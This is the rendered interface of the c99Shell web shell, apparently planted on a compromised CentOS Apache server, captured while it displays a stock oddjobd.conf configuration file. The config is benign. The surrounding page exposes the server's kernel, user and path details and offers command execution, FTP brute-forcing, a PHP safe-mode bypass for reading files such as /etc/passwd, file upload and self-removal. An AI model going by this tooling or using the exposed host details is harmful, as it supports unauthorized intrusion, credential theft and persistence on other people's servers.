!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/etc/   drwxr-xr-x
Free 51.23 GB of 127.8 GB (40.08%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     oddjobd.conf (4.35 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?xml version="1.0"?>

<!-- This configuration file controls the oddjob daemon.  It controls
     which requests the daemon will recognize, and whether or not it
     will attempt to fulfill them on the behalf of particular users.

     Create and edit oddjobd-local.conf rather than changing this file
     directly.

     Each <oddjobconfig> contains a mixture of <service> and <include> nodes.
 
     Each <service> element corresponds to a well-known D-Bus address (given
     in the "name" attribute) which the oddjobd daemon will answer to.  It
     may contain one or more <object> elements which each describe an object
     path.  Each <object>, in turn, is named by its "name" attribute.

     Each <object> element must also contain zero or more <interface>
     elements, which are named by their "name" attributes and correspond to
     names of interfaces which the object implements.

     Each <interface> element must contain zero or more <method>
     elements, which are named by their "name" attributes.  Each
     <method> node corresponds to a D-Bus method implemented by the
     object as part of the interface.

     Each method must include an access-control list which contains at
     least one rule, or the daemon will ignore any attempts to call the
     method.

     When checking if a client is allowed to use a method, all deny
     rules are processed, then all allow rules.  The first rule which
     matches the user decides whether access is allowed or denied.

     Access rules can specify either a user (using the "user"
     attribute), or a range of UIDs (using the "min_uid" and "max_uid"
     attributes).

     If SELinux support was compiled in, then a rule can also specify
     whether or not it applies if the SELinux policy is being enforced
     ("selinux_enforcing"), or what the caller's SELinux context
     ("selinux_context"), user ("selinux_user"), role ("selinux_role"),
     or type ("selinux_type") must be for that rule to apply.

     A method may, as part of its definition, specify an external
     program which is to be run when the method is invoked, by including
     a <helper> node.  The <helper> node should include an "exec"
     attribute naming the external program which will be launched to
     accomplish the given task.  Depending on the value of its
     "argument_passing_method" attribute, it will receive its arguments
     either over stdin, one argument per line, or on the command line.
     Depending on the value of the "prepend_user_name" attribute, the
     argument list may or may not begin with the calling user's name.
     The helper will be run with superuser privileges.
 
     Here's what an example oddjobd-local.conf might look like:

     <service name="com.redhat.oddjob">
       <object name="/com/redhat/oddjob">
         <interface name="com.redhat.oddjob">
           <method name="mkhomedirfor">
             <allow user="root"/>
             <allow selinux_enforcing="yes" selinux_role="staff_r"/>
             <allow user="dovecot"/>
           </method>
         </interface>
       </object>

       <object name="/com/redhat/oddjob">
         <interface name="com.redhat.oddjob">
           <method name="mkmyhomedir">
             <helper exec="/usr/bin/pwd" arguments="0" prepend_user_name="no"/>
             <allow min_uid="500"/>
           </method>
         </interface>
       </object>
     </service>
  -->

<oddjobconfig>

  <service name="com.redhat.oddjob">
    <object name="/com/redhat/oddjob">
      <interface name="com.redhat.oddjob">

        <method name="list">
          <allow min_uid="0" max_uid="0"/>
        </method>

        <method name="quit">
          <allow user="root"/>
        </method>

        <method name="reload">
          <allow user="root"/>
        </method>

        <method name="reboot">
          <helper exec="/sbin/reboot" arguments="0"/>
        </method>

        <method name="mkmyhomedir">
          <helper exec="/usr/lib/oddjob/mkhomedir" arguments="0" prepend_user_name="yes"/>
          <allow user="root"/>
        </method>

        <method name="mkhomedirfor">
          <helper exec="/usr/lib/oddjob/mkhomedir" arguments="1"/>
          <allow user="root"/>
        </method>

      </interface>

    </object>

  </service>

  <include ignore_missing="yes">/etc/oddjobd.conf.d/*.conf</include>
  <include ignore_missing="yes">/etc/oddjobd-local.conf</include>

</oddjobconfig>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0123 ]--